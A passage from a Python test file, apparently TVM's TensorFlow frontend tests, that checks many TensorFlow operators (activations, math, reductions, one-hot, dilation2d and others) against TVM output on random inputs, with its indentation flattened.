inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
for mode in ["graph_executor", "vm"]:
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.relu(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Relu:0", mode=mode)
def test_forward_leaky_relu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
for mode in ["graph_executor", "vm"]:
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.leaky_relu(in1, alpha=0.4)
compare_tf_with_tvm(inp_array, "Placeholder:0", "LeakyRelu:0", mode=mode)
def test_forward_elu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.elu(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Elu:0")
def test_forward_selu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.selu(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Selu:0")
def test_forward_tanh():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.tanh(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Tanh:0")
#######################################################################
# Softmax
# -------
def test_forward_softmax():
"""test operator Softmax """
def check_softmax(in_shape, axis, dtype):
np_data = np.random.uniform(-100, 100, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.nn.softmax(in_data, axis=axis, name="Softmax")
compare_tf_with_tvm([np_data], ["in_data:0"], "Softmax:0")
check_softmax((2, 3, 5), 2, "float32")
check_softmax((2, 3, 5), -1, "float32")
#######################################################################
# Tensor
# ------
def test_forward_round():
"""test Round"""
np_data = np.random.uniform(-10, 10, size=(5, 7)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7), name="in_data")
tf.round(in_data, name="round")
compare_tf_with_tvm([np_data], ["in_data:0"], "round:0")
def test_forward_abs():
"""test operator Abs"""
np_data = np.random.uniform(1, 100, size=(9, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (9, 11), name="in_data")
tf.math.abs(in_data, name="abs")
compare_tf_with_tvm([np_data], ["in_data:0"], "abs:0")
def _test_forward_zeros_like(in_shape, dtype):
np_data = np.random.uniform(-10, 10, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.zeros_like(in_data, name="zeros_like")
compare_tf_with_tvm([np_data], ["in_data:0"], "zeros_like:0")
def test_forward_zeros_like():
if tf.__version__ < LooseVersion("1.2"):
_test_forward_zeros_like((2, 3), "int32")
_test_forward_zeros_like((2, 3, 5), "int8")
_test_forward_zeros_like((2, 3, 5, 7), "uint16")
_test_forward_zeros_like((2, 3, 11), "float32")
_test_forward_zeros_like((2, 3, 11), "float64")
def test_forward_squared_difference():
ishape = (1, 3, 10, 14)
inp_array_a = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
inp_array_b = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array_a.shape, dtype=inp_array_a.dtype, name="in1")
in2 = tf.placeholder(shape=inp_array_b.shape, dtype=inp_array_b.dtype, name="in2")
out = tf.math.squared_difference(in1, in2)
compare_tf_with_tvm([inp_array_a, inp_array_b], [in1.name, in2.name], out.name)
def _test_forward_reverse_v2(in_shape, axis, dtype):
np_data = np.random.uniform(-10, 10, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.reverse(in_data, axis=[axis], name="reverse")
compare_tf_with_tvm([np_data], ["in_data:0"], "reverse:0")
def test_forward_reverse_v2():
"""test ReverseV2"""
_test_forward_reverse_v2((2, 3), 0, "int32")
_test_forward_reverse_v2((2, 3, 5), 2, "float32")
_test_forward_reverse_v2((2, 3, 5, 7), 1, "float32")
_test_forward_reverse_v2((2, 3, 5), -1, "float64")
_test_forward_reverse_v2((2, 3, 5), -3, "float64")
def test_forward_sign():
"""test Sign"""
np_data = np.random.uniform(-10, 10, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7, 11), name="in_data")
tf.sign(in_data, name="sign")
compare_tf_with_tvm([np_data], ["in_data:0"], "sign:0")
def test_forward_square():
"""test operator Square """
np_data = np.random.uniform(1, 100, size=(2, 3, 5)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (2, 3, 5), name="in_data")
tf.square(in_data, name="square")
compare_tf_with_tvm([np_data], ["in_data:0"], "square:0")
def test_forward_pow_exp():
"""test Pow and Exp """
np_in1 = np.random.uniform(-2, 2, size=(5, 7, 11)).astype(np.float32)
np_in2 = np.random.uniform(-2, 2, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in1 = tf.placeholder(tf.float32, (5, 7, 11), name="in1")
in2 = tf.placeholder(tf.float32, (5, 7, 11), name="in2")
out1 = tf.pow(in1, in2, name="pow")
out = tf.exp(in1, name="exp")
compare_tf_with_tvm([np_in1, np_in2], ["in1:0", "in2:0"], "pow:0")
compare_tf_with_tvm([np_in1], ["in1:0"], "exp:0")
def test_forward_unary():
def _test_forward_unary(op, a_min=1, a_max=5, dtype=np.float32):
"""test unary operators"""
np_data = np.random.uniform(a_min, a_max, size=(2, 3, 5)).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, (2, 3, 5), name="in_data")
out = op(in_data)
compare_tf_with_tvm([np_data], ["in_data:0"], out.name)
_test_forward_unary(tf.acos, -1, 1)
_test_forward_unary(tf.asin, -1, 1)
_test_forward_unary(tf.atanh, -1, 1)
_test_forward_unary(tf.sinh)
_test_forward_unary(tf.cosh)
_test_forward_unary(tf.acosh)
_test_forward_unary(tf.asinh)
_test_forward_unary(tf.atan)
_test_forward_unary(tf.sin)
_test_forward_unary(tf.cos)
_test_forward_unary(tf.tan)
_test_forward_unary(tf.tanh)
_test_forward_unary(tf.erf)
_test_forward_unary(tf.log)
_test_forward_unary(tf.log1p)
def test_forward_atan2():
"""test operator tan """
tf.disable_eager_execution()
np_data_1 = np.random.uniform(1, 100, size=(2, 3, 5)).astype(np.float32)
np_data_2 = np.random.uniform(1, 100, size=(2, 3, 5)).astype(np.float32)
tf.reset_default_graph()
in_data_1 = tf.placeholder(tf.float32, (2, 3, 5), name="in_data_1")
in_data_2 = tf.placeholder(tf.float32, (2, 3, 5), name="in_data_2")
tf.atan2(in_data_1, in_data_2, name="atan2")
compare_tf_with_tvm([np_data_1, np_data_2], ["in_data_1:0", "in_data_2:0"], "atan2:0")
def test_forward_expm1():
"""test operator expm1 """
def _test_forward_expm1(shape):
tf.disable_eager_execution()
np_data = np.random.uniform(1, 10, size=shape).astype(np.float32)
tf.reset_default_graph()
in_data = tf.placeholder(tf.float32, shape, name="in_data")
tf.expm1(in_data, name="expm1")
compare_tf_with_tvm([np_data], ["in_data:0"], "expm1:0")
_test_forward_expm1([1, 100])
_test_forward_expm1([1, 10, 10])
_test_forward_expm1([2, 5, 2, 5])
def test_forward_softsign():
"""test operator softsign """
def _test_forward_softsign(shape):
tf.disable_eager_execution()
np_data = np.random.uniform(1, 100, size=shape).astype(np.float32)
tf.reset_default_graph()
in_data = tf.placeholder(tf.float32, shape, name="in_data")
tf.nn.softsign(in_data, name="softsign")
compare_tf_with_tvm([np_data], ["in_data:0"], "softsign:0")
_test_forward_softsign([1, 100])
_test_forward_softsign([1, 10, 10])
_test_forward_softsign([2, 5, 2, 5])
def test_forward_rint():
"""test operator rint """
def _test_forward_rint(shape):
tf.disable_eager_execution()
np_data = np.random.uniform(-100, 100, size=shape).astype(np.float32)
tf.reset_default_graph()
in_data = tf.placeholder(tf.float32, shape, name="in_data")
tf.math.rint(in_data, name="rint")
compare_tf_with_tvm([np_data], ["in_data:0"], "rint:0")
_test_forward_rint([100])
_test_forward_rint([1, 100])
_test_forward_rint([1, 10, 10])
_test_forward_rint([2, 5, 2, 5])
def test_forward_negative():
"""test tf operator Neg """
np_data = np.random.uniform(-100, 255, size=(224, 224, 3)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (224, 224, 3), name="in_data")
tf.negative(in_data, name="negative")
compare_tf_with_tvm([np_data], ["in_data:0"], "negative:0")
def test_forward_log_softmax():
"""test operator LogSoftmax"""
np_data = np.random.uniform(1, 100, size=(9, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (9, 11), name="in_data")
tf.math.log_softmax(in_data, name="LogSoftmax")
compare_tf_with_tvm([np_data], ["in_data:0"], "LogSoftmax:0")
def test_forward_softplus():
"""test operator Softplus"""
np_data = np.random.uniform(1, 10, size=(2, 3, 5)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (2, 3, 5), name="in_data")
tf.nn.softplus(in_data, name="softplus")
compare_tf_with_tvm([np_data], ["in_data:0"], "softplus:0")
def test_forward_rsqrt():
"""test Rsqrt """
np_data = np.random.uniform(1, 100, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7, 11), name="in_data")
tf.rsqrt(in_data, name="rsqrt")
compare_tf_with_tvm([np_data], ["in_data:0"], "rsqrt:0")
def test_forward_sqrt():
"""test Sqrt """
np_data = np.random.uniform(1, 100, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7, 11), name="in_data")
tf.sqrt(in_data, name="sqrt")
compare_tf_with_tvm([np_data], ["in_data:0"], "sqrt:0")
def _test_forward_right_shift(in_shape, dtype):
"""test operator RightShift"""
lh_data = np.random.randint(1, 3, size=in_shape).astype(dtype)
rh_data = np.random.randint(1, 8, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, in_shape, name="lft_data")
rgt_data = tf.placeholder(dtype, in_shape, name="rgt_data")
tf.bitwise.right_shift(lft_data, rgt_data, name="RightShift")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "RightShift:0")
def test_forward_right_shift():
_test_forward_right_shift((7,), "int32")
_test_forward_right_shift((3, 11), "int16")
def _test_forward_left_shift(in_shape, dtype):
"""test operator LeftShift"""
lh_data = np.random.randint(100, 1000000, size=in_shape).astype(dtype)
rh_data = np.random.randint(1, 3, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, in_shape, name="lft_data")
rgt_data = tf.placeholder(dtype, in_shape, name="rgt_data")
tf.bitwise.left_shift(lft_data, rgt_data, name="LeftShift")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "LeftShift:0")
def test_forward_left_shift():
_test_forward_left_shift((10,), "int32")
_test_forward_left_shift((224, 224, 3), "int16")
#######################################################################
# Mean
# ----
def test_forward_mean():
def check_mean(ishape, **kwargs):
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.keras.backend.mean(in1, **kwargs)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Mean:0", no_gpu=True)
check_mean((10, 8, 16, 32))
check_mean((10, 8, 16, 32), axis=(2, 3))
check_mean((10, 8, 16, 32), axis=(1, 2), keepdims=True)
#######################################################################
# Size
# ----
def test_forward_size():
def check_size(ishape):
np_input = np.random.uniform(size=ishape).astype(np.float32)
# if all dimensions are constant, TF will optimize away size operator into constant
tf_input_shape = list(np_input.shape)
tf_input_shape[0] = None
with tf.Graph().as_default():
input = tf.placeholder(shape=tf_input_shape, dtype=np_input.dtype, name="input")
tf.size(input, name="size")
compare_tf_with_tvm([np_input], ["input:0"], "size:0")
check_size((10, 8, 16, 32))
check_size((10,))
#######################################################################
# All, Any, Max, Min, Prod, variance, std, logsumexp, euclidean_norm
# ------------------------------------------------------------------
def test_forward_reduce():
def _check_op(tf_op, ishape, axis, keepdims, dtype="float32"):
tf.reset_default_graph()
if dtype == "bool":
np_data = np.random.choice([True, False], size=ishape)
else:
np_data = np.random.uniform(size=ishape).astype(dtype)
if tf_op == tf.math.reduce_prod:
axis = 1
np_data = np_data.reshape(1, -1)
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, name="in_data")
reduce_op = tf_op(in_data, axis=axis, keepdims=keepdims, name="reduce_std")
compare_tf_with_tvm([np_data], ["in_data:0"], reduce_op.name)
def _test_math_op(op, dtypes=["int32", "float32"]):
for dtype in dtypes:
_check_op(op, (3, 10), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (8, 16, 32), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (1, 8, 8, 3), axis=(2, 3), keepdims=True, dtype=dtype)
_check_op(op, (2, 3, 10, 10), axis=(1, 2), keepdims=True, dtype=dtype)
_test_math_op(tf.math.reduce_all, dtypes=["bool"])
_test_math_op(tf.math.reduce_any, dtypes=["bool"])
_test_math_op(tf.math.reduce_max)
_test_math_op(tf.math.reduce_min)
_test_math_op(tf.math.reduce_prod)
_test_math_op(tf.math.reduce_variance, dtypes=["float32"])
_test_math_op(tf.math.reduce_std, dtypes=["float32"])
_test_math_op(tf.math.reduce_logsumexp, dtypes=["float32"])
if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
_test_math_op(tf.math.reduce_euclidean_norm)
#######################################################################
# All, Max, Min
# ------------------------------------------------------------------
def test_forward_raw_reduce():
def _check_op(tf_op, ishape, axis, keepdims, range_axis=False, dtype="float32"):
tf.reset_default_graph()
if dtype == "bool":
np_data = np.random.choice([True, False], size=ishape)
else:
np_data = np.random.uniform(size=ishape).astype(dtype)
if tf_op == tf.math.reduce_prod:
axis = 1
np_data = np_data.reshape(1, -1)
with tf.Graph().as_default():
if range_axis:
axis = tf.range(axis[0], axis[1], axis[2], name="range", dtype="int32")
in_data = tf.placeholder(dtype, name="in_data")
reduce_op = tf_op(input=in_data, axis=axis, keep_dims=keepdims, name="reduce_std")
compare_tf_with_tvm([np_data], ["in_data:0"], reduce_op.name)
def _test_raw_reduce_op(op, dtypes=["int32", "float32"]):
for dtype in dtypes:
_check_op(op, (3, 10), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (8, 16, 32), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (1, 8, 8, 3), axis=(2, 3), keepdims=True, dtype=dtype)
_check_op(op, (2, 3, 10, 10), axis=(1, 2), keepdims=True, dtype=dtype)
_check_op(op, (1, 8, 8, 3), axis=(2, 4, 1), keepdims=True, range_axis=True, dtype=dtype)
_check_op(
op, (2, 3, 10, 10), axis=(1, 3, 1), keepdims=True, range_axis=True, dtype=dtype
)
if package_version.parse(tf.VERSION) >= package_version.parse("2.4.1"):
_test_raw_reduce_op(tf.raw_ops.All, dtypes=["bool"])
_test_raw_reduce_op(tf.raw_ops.Max)
_test_raw_reduce_op(tf.raw_ops.Min)
#######################################################################
# Relational operators
# --------------------
def _test_forward_rel_op(data, func):
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data[0].shape, dtype=data[0].dtype, name="in1")
in2 = tf.placeholder(shape=data[1].shape, dtype=data[1].dtype, name="in2")
op = func(in1, in2, name="op")
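        # Cast the boolean comparison result to int32 so the compared output is numeric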
out = tf.cast(op, tf.int32, name="out1")
compare_tf_with_tvm([data[0], data[1]], ["in1:0", "in2:0"], "out1:0")
def test_forward_rel_ops():
t1 = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
t2 = np.array([[9, 8, 7], [6, 5, 4], [3, 2, 1]])
_test_forward_rel_op([t1, t2], math_ops.less)
_test_forward_rel_op([t1, t2], math_ops.greater)
_test_forward_rel_op([t1, t2], math_ops.less_equal)
_test_forward_rel_op([t1, t2], math_ops.greater_equal)
_test_forward_rel_op([t1, t2], math_ops.equal)
_test_forward_rel_op([t1, t2], math_ops.not_equal)
#######################################################################
# ExpandDims
# ----------
def _test_forward_expand_dims(data, axis):
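    """One iteration of ExpandDims comparing TF and TVM outputs."""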
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data.shape, dtype=data.dtype, name="in1")
out = tf.expand_dims(in1, axis)
compare_tf_with_tvm([data], [in1.name], out.name)
def test_forward_expand_dims():
_test_forward_expand_dims(np.int32(1), 0)
_test_forward_expand_dims(np.array([1]), 0)
_test_forward_expand_dims(np.array([1]), -1)
_test_forward_expand_dims(np.array([[1], [2]]), 0)
_test_forward_expand_dims(np.array([[1], [2]]), 1)
_test_forward_expand_dims(np.array([[1], [2]]), -1)
#######################################################################
# Maximum, Minimum
# ----------------
def test_forward_maximum():
"""test Op Maximum"""
def check_maximum(lh_shape, rh_shape, dtype):
tf.reset_default_graph()
lh_data = np.random.uniform(size=lh_shape).astype(dtype)
rh_data = np.random.uniform(size=rh_shape).astype(dtype)
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, name="lft_data")
rgt_data = tf.placeholder(dtype, name="rgt_data")
tf.math.maximum(lft_data, rgt_data, name="maximum")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "maximum:0")
check_maximum((10, 8, 16, 32), (1,), dtype="int32")
check_maximum((10, 8, 16, 32), (10, 8, 16, 32), dtype="float32")
def test_forward_minimum():
"""test Op Minimum"""
def check_minimum(lh_shape, rh_shape, dtype):
tf.reset_default_graph()
lh_data = np.random.uniform(size=lh_shape).astype(dtype)
rh_data = np.random.uniform(size=rh_shape).astype(dtype)
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, name="lft_data")
rgt_data = tf.placeholder(dtype, name="rgt_data")
tf.math.minimum(lft_data, rgt_data, name="minimum")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "minimum:0")
check_minimum((10, 8, 16, 32), (1,), dtype="int32")
check_minimum((10, 8, 16, 32), (10, 8, 16, 32), dtype="float32")
#######################################################################
# PlaceholderWithDefault
# ----------------------
def test_placeholder():
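    """Test PlaceholderWithDefault together with a regular Placeholder and a Variable."""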
with tf.Graph().as_default():
in_data1 = np.random.uniform(-5, 5, size=(3, 4, 5)).astype(np.float32)
var1 = tf.Variable(in_data1, name="in1")
var2 = array_ops.placeholder_with_default(var1, None, name="place1")
in_data2 = np.random.uniform(-5, 5, size=(3, 4, 5)).astype(np.float32)
place1 = array_ops.placeholder(shape=in_data1.shape, dtype=in_data1.dtype, name="in2")
out1 = tf.math.add(var1, var2, name="out1")
out2 = tf.math.add(out1, place1, name="out2")
compare_tf_with_tvm(
[in_data1, in_data2], ["place1:0", "in2:0"], "out2:0", init_global_variables=True
)
#######################################################################
# OneHot
# ----------------------
def _test_forward_one_hot(indices_shape, depth, on_value, off_value, axis, out_dtype):
inp_array1 = np.random.randint(0, 5, size=indices_shape)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array1.shape, dtype=inp_array1.dtype)
out = tf.one_hot(in1, depth, on_value, off_value, axis, dtype=out_dtype)
compare_tf_with_tvm(inp_array1, in1.name, out.name)
def test_forward_one_hot():
_test_forward_one_hot((3,), 3, 1, 0, -1, "int32")
_test_forward_one_hot((3,), 3, 1.0, 0.0, -1, "float32")
_test_forward_one_hot((2, 2), 5, 2, -2, 0, "int32")
_test_forward_one_hot((2, 2), 5, 0.5, -0.5, 1, "float32")
_test_forward_one_hot((3, 2, 4, 5), 6, 1, 0, 1, "int32")
_test_forward_one_hot((3, 2, 4, 5), 6, 1.0, 0.0, 0, "float32")
#######################################################################
# AddN
# ----------------------
def _test_forward_add_n(inputs):
tf.reset_default_graph()
with tf.Graph().as_default():
temp = []
for each in inputs:
temp.append(tf.placeholder(shape=each.shape, dtype=each.dtype))
output = tf.add_n(temp)
compare_tf_with_tvm([each for each in inputs], [each.name for each in temp], output.name)
def test_forward_add_n():
x = np.random.randint(1, 100, size=(3, 3, 3), dtype=np.int32)
y = np.random.randint(1, 100, size=(3, 3, 3), dtype=np.int32)
z = np.random.randint(1, 100, size=(3, 3, 3), dtype=np.int32)
m, n, o = x.astype(np.float32), y.astype(np.float32), z.astype(np.float32)
in0 = x
in1 = [x, y]
in2 = (x, y, z)
in3 = m
in4 = [m, n]
in5 = (m, n, o)
_test_forward_add_n(in0)
_test_forward_add_n(in1)
_test_forward_add_n(in2)
_test_forward_add_n(in3)
_test_forward_add_n(in4)
_test_forward_add_n(in5)
#######################################################################
# Sharing params case
# ----------------------
def test_sharing_node():
"""Test the sharing params case."""
np_data = np.random.uniform(size=(2, 2, 2)).astype("float32")
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, shape=(2, 2, 2), name="in_data")
axis = tf.constant([-1], dtype=tf.int32, name="axis")
mean0 = tf.reduce_mean(in_data, axis=axis, keepdims=False, name="mean0")
mean1 = tf.reduce_mean(in_data, axis=axis, keepdims=False, name="mean1")
out = tf.add(mean0, mean1, name="out")
compare_tf_with_tvm([np_data], ["in_data:0"], "out:0")
#######################################################################
# Unravel Index
# ----------------------
def _test_forward_unravel_index(inputs):
tf.reset_default_graph()
with tf.Graph().as_default():
temp = []
for each in inputs:
temp.append(tf.placeholder(shape=each.shape, dtype=each.dtype))
output = tf.unravel_index(temp[0], temp[1])
compare_tf_with_tvm([each for each in inputs], [each.name for each in temp], output.name)
def _test_forward_unravel_index_scalar(x, y, dtype="int32"):
tf.reset_default_graph()
with tf.Graph().as_default():
indices_1 = constant_op.constant(x, dtype=dtype)
dims_1 = constant_op.constant(y, dtype=dtype)
out_1 = array_ops.unravel_index(indices_1, dims_1)
compare_tf_with_tvm([], [], out_1.name)
def test_forward_unravel_index():
x = np.array([0, 1, 2, 3])
y = np.array([2, 2])
_test_forward_unravel_index([x, y])
x = np.array([0, 1, 2, 5])
y = np.array([2, 3])
_test_forward_unravel_index([x, y])
x = np.array([0, 1, 2, 5])
y = np.array([6])
_test_forward_unravel_index([x, y])
x = np.array([102, 300, 16])
y = np.array([10, 10, 9, 6])
_test_forward_unravel_index([x, y])
x = np.array([100])
y = np.array([10, 10, 9, 6])
_test_forward_unravel_index([x, y])
# Test scalar input
_test_forward_unravel_index_scalar(13, [1, 4, 5, 2])
#######################################################################
# Dilation2d
# ----------------------
def _test_dilation2d(tensor_in_sizes, filter_in_sizes, strides, dilations, padding):
""" One iteration of dilation2d with given shapes and attributes """
total_size_1 = np.prod(tensor_in_sizes)
total_size_2 = np.prod(filter_in_sizes)
# Initializes the input tensor with array containing incrementing
# numbers from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
filter_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_filter = constant_op.constant(filter_array, shape=filter_in_sizes, dtype="float32")
nn_ops.dilation2d(in_data, in_filter, strides=strides, rates=dilations, padding=padding)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"Dilation2D:0",
no_gpu=True,
)
def test_forward_dilation():
_test_dilation2d([1, 18, 18, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "VALID")
_test_dilation2d([1, 15, 15, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "SAME")
_test_dilation2d([1, 5, 5, 1], [2, 2, 1], [1, 1, 1, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 5, 5, 1], [3, 3, 1], [1, 1, 1, 1], [1, 2, 2, 1], "VALID")
_test_dilation2d([1, 5, 5, 3], [3, 3, 3], [1, 1, 1, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 28, 28, 3], [5, 5, 3], [1, 2, 2, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 224, 224, 10], [8, 8, 10], [1, 1, 1, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 18, 18, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "SAME")
_test_dilation2d([1, 15, 15, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "VALID")
_test_dilation2d([1, 5, 5, 1], [7, 2, 1], [1, 3, 1, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 5, 5, 1], [3, 4, 1], [1, 2, 1, 1], [1, 2, 2, 1], "SAME")
_test_dilation2d([1, 5, 5, 3], [3, 3, 3], [1, 1, 4, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 28, 28, 3], [5, 6, 3], [1, 1, 2, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 224, 224, 10], [8, 8, 10], [1, 3, 1, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 3, 3, 1], [2, 2, 1], [1, 1, 1, 1], [1, 2, 2, 1], "SAME")
_test_dilation2d([1, 3, 3, 1], [2, 2, 1], [1, 1, 1, 1], [1, 1, 2, 1], "VALID")
def _test_identityn(data_np_list):
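    """Feed a list of arrays through tf.identity_n and compare every output with TVM."""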
with tf.Graph().as_default():
data_tensors = []
data_tensors_name = []
for index, data_np in enumerate(data_np_list):
tensor_name = f"data_{index}"
data_tensors_name.append(tensor_name + ":0")
data_tensors.append(
tf.placeholder(shape=data_np.shape, dtype=str(data_np.dtype), name=tensor_name)
)
output = tf.identity_n(data_tensors)
output_names = [out.name for out in output]
compare_tf_with_tvm(
data_np_list,
data_tensors_name,
output_names,
)
@pytest.mark.parametrize(
"data_np_list",
[
(
[
np.array([[1, 1], [0, 3], [0, 1], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4, 5], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
]
),
(
[
np.array([[1, 1], [0, 3], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
np.array([True, False, True]),
]
),
(
[
np.array([]),
np.array([[]]),
]
),
],
)
def test_forward_identityn(data_np_list):
_test_identityn(data_np_list)
#######################################################################
# infinity ops
# ------------
def _verify_infiniteness_ops(tf_op, name):
"""test operator infinity ops"""
# Only float types are allowed in Tensorflow for isfinite and isinf
# float16 is failing on cuda
tf_dtypes = ["float32", "float64"]
for tf_dtype in tf_dtypes:
shape = (8, 8)
data = np.random.uniform(size=shape).astype(tf_dtype)
        data.ravel()[np.random.choice(data.size, int(data.size * 0.5), replace=False)] = np.inf
data.ravel()[np.random.choice(data.size, int(data.size * 0.5), replace=False)] = np.nan
tf.reset_default_graph()
in_data = tf.placeholder(tf_dtype, shape, name="in_data")
tf_op(in_data, name=name)
compare_tf_with_tvm([data], ["in_data:0"], "{}:0".format(name))
def test_forward_isinf():
_verify_infiniteness_ops(tf.is_inf, "isinf")
def test_forward_isfinite():
_verify_infiniteness_ops(tf.is_finite, "isfinite")
def test_forward_isnan():
_verify_infiniteness_ops(tf.is_nan, "isnan")
def _test_spop_placeholder_without_shape_info():
with tf.Graph().as_default():
@function.Defun(*[tf.int32] * 2)
def Forward(x, y):
print(x.name)
print(y.name)
b = tf.add(x, y)
return b
pl1 = tf.placeholder(tf.int32, name="pl1")
pl2 = tf.placeholder(tf.int32, name="pl2")
pl3 = tf.placeholder(tf.int32, name="pl3")
data = np.array([[-1, 1], [2, -2]], dtype=np.int32)
data2 = np.array([[-2, 3], [4, -6]], dtype=np.int32)
data3 = np.array([[-2, 3], [4, -6]], dtype=np.int32)
z1 = gen_functional_ops.StatefulPartitionedCall(args=[pl1, pl2], Tout=[tf.int32], f=Forward)
z2 = z1 + pl3
compare_tf_with_tvm(
[data, data2, data3],
["pl1:0", "pl2:0", "pl3:0"],
["StatefulPartitionedCall:0", z2.name],
mode="vm",
init_global_variables=True,
)
def _test_spop_placeholder_with_shape_and_default_value():
with tf.Graph().as_default():
data = np.ones([1], dtype=int).astype(np.int32)
dataVar = tf.Variable(data, shape=data.shape)
pl1 = array_ops.placeholder_with_default(dataVar, shape=data.shape, name="pl1")
tpl = tf.convert_to_tensor(pl1, dtype=tf.int32)
@function.Defun(*[tf.int32])
def pl_with_default(pl):
return tf.expand_dims(tf.multiply(pl, pl), 0)
z = gen_functional_ops.StatefulPartitionedCall(
args=[tpl], Tout=[tf.int32], f=pl_with_default
)
compare_tf_with_tvm(
data, ["pl1:0"], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_placeholder_numpy_arange_feed():
with tf.Graph().as_default():
t1 = tf.placeholder(tf.int32, (3, 3, 3), "t1")
t1_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
t2 = tf.placeholder(tf.int32, (3, 3, 3), "t2")
t2_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
@tf.function
def add(x, y):
return tf.add(x, y, "add_t1_t2")
t3 = add(t1, t2)
compare_tf_with_tvm(
